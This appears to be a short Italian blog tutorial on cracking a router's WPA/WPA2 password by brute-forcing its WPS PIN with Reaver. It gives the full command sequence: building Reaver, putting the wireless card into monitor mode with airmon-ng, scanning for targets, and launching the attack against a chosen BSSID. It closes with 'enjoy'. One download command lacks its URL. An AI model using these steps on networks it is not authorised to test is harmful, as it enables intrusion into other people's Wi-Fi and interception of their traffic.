Reaver WPS riesce con un attaco brute force a decifrare la password wpa/wpa2 della nostra rete, in determinate condizioni. Prima di tutto il WPS o Wi-Fi Protected Setup è diffuso nei router domestici, in genere lo si trova sotto la voce wifi-protezione. La vulnerabilità si nasconde prorpio in questo standard, in quanto, se si utilizza la modalità di inserimento pin al posto del push button, questa apre una falla. Praticamente bombardando il router di pacchetti, questo restituisce molte informazioni utili al cracking. Comunque in rete si trovano spiegazioni più esaustive e dettagliate. Come prima cosa bisogna installare aircrack-ng, e compilarselo, dato che non è più presente nei repository ufficiali, oppure prelevarlo dal mio repository. Per avere quindi reaver su Debian:
$ sudo apt-get install libpcap0.8-dev libsqlite3-dev
$ wget
$ tar -xvf reaver-1.3.tar.gz
$ cd reaver-1.3/src/
$ ./configure
$ make
$ sudo make install
mettere in monitor mode la scheda:
# airmon-ng start wlan0
il comando sopra creerà mon0 in monitor mode
Interface Chipset Driver
wlan0 Ralink 2561 PCI rt61pci – [phy0]
(monitor mode enabled on mon0)
scanning per rilevare reti wpa:
# walsh -i mon0 --ignore-fcs
attacco:
# reaver -i mon0 -b 00:11:22:33:44:55 --dh-small
per altri comandi leggere la documentazione all'interno del pacchetto.
enjoy 😉